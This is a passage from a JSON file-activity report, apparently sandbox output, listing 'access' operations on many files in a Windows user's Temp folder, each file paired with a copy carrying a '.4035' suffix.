7lfsqb0g\\appdata\\local\\temp\\dd_vcredist_x86_20170623160420_001_vcruntimeadditional_x86.log", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_vcredist_x86_20170714083654.log.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_vcredist_x86_20170714083654.log.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_vcredist_x86_20170714083654.log", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_vcredist_x86_20170714083654.log", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_vcredist_x86_20170714083654_000_vcRuntimeMinimum_x86.log.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_vcredist_x86_20170714083654_000_vcruntimeminimum_x86.log.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_vcredist_x86_20170714083654_000_vcRuntimeMinimum_x86.log", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_vcredist_x86_20170714083654_000_vcruntimeminimum_x86.log", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_vcredist_x86_20170714083654_001_vcRuntimeAdditional_x86.log.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_vcredist_x86_20170714083654_001_vcruntimeadditional_x86.log.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_vcredist_x86_20170714083654_001_vcRuntimeAdditional_x86.log", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_vcredist_x86_20170714083654_001_vcruntimeadditional_x86.log", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_vcredist_x86_20170714083726.log.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_vcredist_x86_20170714083726.log.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_vcredist_x86_20170714083726.log", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_vcredist_x86_20170714083726.log", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_wcf_CA_smci_20170623_120916_381.txt.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_wcf_ca_smci_20170623_120916_381.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_wcf_CA_smci_20170623_120916_381.txt", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_wcf_ca_smci_20170623_120916_381.txt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_wcf_CA_smci_20170623_120924_088.txt.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_wcf_ca_smci_20170623_120924_088.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_wcf_CA_smci_20170623_120924_088.txt", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_wcf_ca_smci_20170623_120924_088.txt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_wcf_CA_smci_20170623_121050_026.txt.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_wcf_ca_smci_20170623_121050_026.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_wcf_CA_smci_20170623_121050_026.txt", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_wcf_ca_smci_20170623_121050_026.txt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_wcf_CA_smci_20170623_121051_508.txt.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_wcf_ca_smci_20170623_121051_508.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_wcf_CA_smci_20170623_121051_508.txt", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_wcf_ca_smci_20170623_121051_508.txt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_wcf_CA_smci_20170623_121441_919.txt.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_wcf_ca_smci_20170623_121441_919.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_wcf_CA_smci_20170623_121441_919.txt", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_wcf_ca_smci_20170623_121441_919.txt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_wcf_CA_smci_20170623_121443_479.txt.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_wcf_ca_smci_20170623_121443_479.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_wcf_CA_smci_20170623_121443_479.txt", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_wcf_ca_smci_20170623_121443_479.txt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\f3602e71-f411-48dc-a8b4-8e28ad592e6d.tmp.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\f3602e71-f411-48dc-a8b4-8e28ad592e6d.tmp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\f3602e71-f411-48dc-a8b4-8e28ad592e6d.tmp", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\f3602e71-f411-48dc-a8b4-8e28ad592e6d.tmp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\FXBmw2STc_LGPu1.wav.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\fxbmw2stc_lgpu1.wav.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\FXBmw2STc_LGPu1.wav", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\fxbmw2stc_lgpu1.wav", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\goMeedoGx1tW.mkv.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\gomeedogx1tw.mkv.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\goMeedoGx1tW.mkv", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\gomeedogx1tw.mkv", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\ighSePHGwTinByvQOJOx.wav.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\ighsephgwtinbyvqojox.wav.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\ighSePHGwTinByvQOJOx.wav", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\ighsephgwtinbyvqojox.wav", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\ihFtBLLSLsDacPFyE.mkv.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\ihftbllslsdacpfye.mkv.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\ihFtBLLSLsDacPFyE.mkv", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\ihftbllslsdacpfye.mkv", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\JAUReg.log.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\jaureg.log.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\JAUReg.log", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\jaureg.log", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\JavaDeployReg.log.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\javadeployreg.log.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\JavaDeployReg.log", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\javadeployreg.log", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\java_install.log.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\java_install.log.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\java_install.log", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\java_install.log", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\java_install_reg.log.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\java_install_reg.log.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\java_install_reg.log", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\java_install_reg.log", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\jawshtml.html.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\jawshtml.html.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\jawshtml.html", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\jawshtml.html", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\jmWrfy4iDuLqE.wav.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\jmwrfy4idulqe.wav.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\jmWrfy4iDuLqE.wav", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\jmwrfy4idulqe.wav", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\jusched.log.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\jusched.log.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\jusched.log", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\jusched.log", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\KRNpdaBZxzcXMFapMkSw.swf.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\krnpdabzxzcxmfapmksw.swf.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\KRNpdaBZxzcXMFapMkSw.swf", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\krnpdabzxzcxmfapmksw.swf", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\KVbE1A7YY.pdf.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\kvbe1a7yy.pdf.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\KVbE1A7YY.pdf", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\kvbe1a7yy.pdf", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\l3z97qs5z.avi.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\l3z97qs5z.avi.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\l3z97qs5z.avi", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\l3z97qs5z.avi", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\LoAVVwL.bmp.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\loavvwl.bmp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\LoAVVwL.bmp", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\loavvwl.bmp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\LSLHuAD2luW-2NiM Pa.ots.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\lslhuad2luw-2nim pa.ots.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\LSLHuAD2luW-2NiM Pa.ots", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\lslhuad2luw-2nim pa.ots", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\Microsoft .NET Framework 4 Setup_20170623_160649242-MSI_netfx_Core_x64.msi.txt.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\microsoft .net framework 4 setup_20170623_160649242-msi_netfx_core_x64.msi.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\Microsoft .NET Framework 4 Setup_20170623_160649242-MSI_netfx_Core_x64.msi.txt", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\microsoft .net framework 4 setup_20170623_160649242-msi_netfx_core_x64.msi.txt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\Microsoft .NET Framework 4 Setup_20170623_160649242-MSI_netfx_Extended_x64.msi.txt.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\microsoft .net framework 4 setup_20170623_160649242-msi_netfx_extended_x64.msi.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\Microsoft .NET Framework 4 Setup_20170623_160649242-MSI_netfx_Extended_x64.msi.txt", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\microsoft .net framework 4 setup_20170623_160649242-msi_netfx_extended_x64.msi.txt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\Microsoft .NET Framework 4 Setup_20170623_160649242.html.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\microsoft .net framework 4 setup_20170623_160649242.html.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\Microsoft .NET Framework 4 Setup_20170623_160649242.html", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\microsoft .net framework 4 setup_20170623_160649242.html", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\Microsoft .NET Framework 4.5 Setup_20170623_161006019-MSI_netfx_Full_x64.msi.txt.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\microsoft .net framework 4.5 setup_20170623_161006019-msi_netfx_full_x64.msi.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\Microsoft .NET Framework 4.5 Setup_20170623_161006019-MSI_netfx_Full_x64.msi.txt", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\microsoft .net framework 4.5 setup_20170623_161006019-msi_netfx_full_x64.msi.txt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\Microsoft .NET Framework 4.5 Setup_20170623_161006019.html.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\microsoft .net framework 4.5 setup_20170623_161006019.html.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\Microsoft .NET Framework 4.5 Setup_20170623_161006019.html", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\microsoft .net framework 4.5 setup_20170623_161006019.html", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\Microsoft .NET Framework 4.6 Setup_20170623_161333107-MSI_netfx_Full_x64.msi.txt.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\microsoft .net framework 4.6 setup_20170623_161333107-msi_netfx_full_x64.msi.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\Microsoft .NET Framework 4.6 Setup_20170623_161333107-MSI_netfx_Full_x64.msi.txt", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\microsoft .net framework 4.6 setup_20170623_161333107-msi_netfx_full_x64.msi.txt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\Microsoft .NET Framework 4.6 Setup_20170623_161333107.html.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\microsoft .net framework 4.6 setup_20170623_161333107.html.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\Microsoft .NET Framework 4.6 Setup_20170623_161333107.html", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\microsoft .net framework 4.6 setup_20170623_161333107.html", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\Microsoft Visual C++ 2010 x64 Redistributable Setup_20170623_160213535-MSI_vc_red.msi.txt.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\microsoft visual c++ 2010 x64 redistributable setup_20170623_160213535-msi_vc_red.msi.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\Microsoft Visual C++ 2010 x64 Redistributable Setup_20170623_160213535-MSI_vc_red.msi.txt", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\microsoft visual c++ 2010 x64 redistributable setup_20170623_160213535-msi_vc_red.msi.txt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\Microsoft Visual C++ 2010 x64 Redistributable Setup_20170623_160213535.html.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\microsoft visual c++ 2010 x64 redistributable setup_20170623_160213535.html.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\Microsoft Visual C++ 2010 x64 Redistributable Setup_20170623_160213535.html", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\microsoft visual c++ 2010 x64 redistributable setup_20170623_160213535.html", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\Microsoft Visual C++ 2010 x86 Redistributable Setup_20170623_120200287-MSI_vc_red.msi.txt.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\microsoft visual c++ 2010 x86 redistributable setup_20170623_120200287-msi_vc_red.msi.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\Microsoft Visual C++ 2010 x86 Redistributable Setup_20170623_120200287-MSI_vc_red.msi.txt", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\microsoft visual c++ 2010 x86 redistributable setup_20170623_120200287-msi_vc_red.msi.txt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\Microsoft Visual C++ 2010 x86 Redistributable Setup_20170623_120200287.html.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\microsoft visual c++ 2010 x86 redistributable setup_20170623_120200287.html.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\Microsoft Visual C++ 2010 x86 Redistributable Setup_20170623_120200287.html", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\microsoft visual c++ 2010 x86 redistributable setup_20170623_120200287.html", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\ose00000.exe.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\ose00000.exe.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\ose00000.exe", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\ose00000.exe", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\PyrhzqI4bbIgpkw6If.swf.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\pyrhzqi4bbigpkw6if.swf.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\PyrhzqI4bbIgpkw6If.swf", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\pyrhzqi4bbigpkw6if.swf", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\QrlfDy64irka.jpg.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\qrlfdy64irka.jpg.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 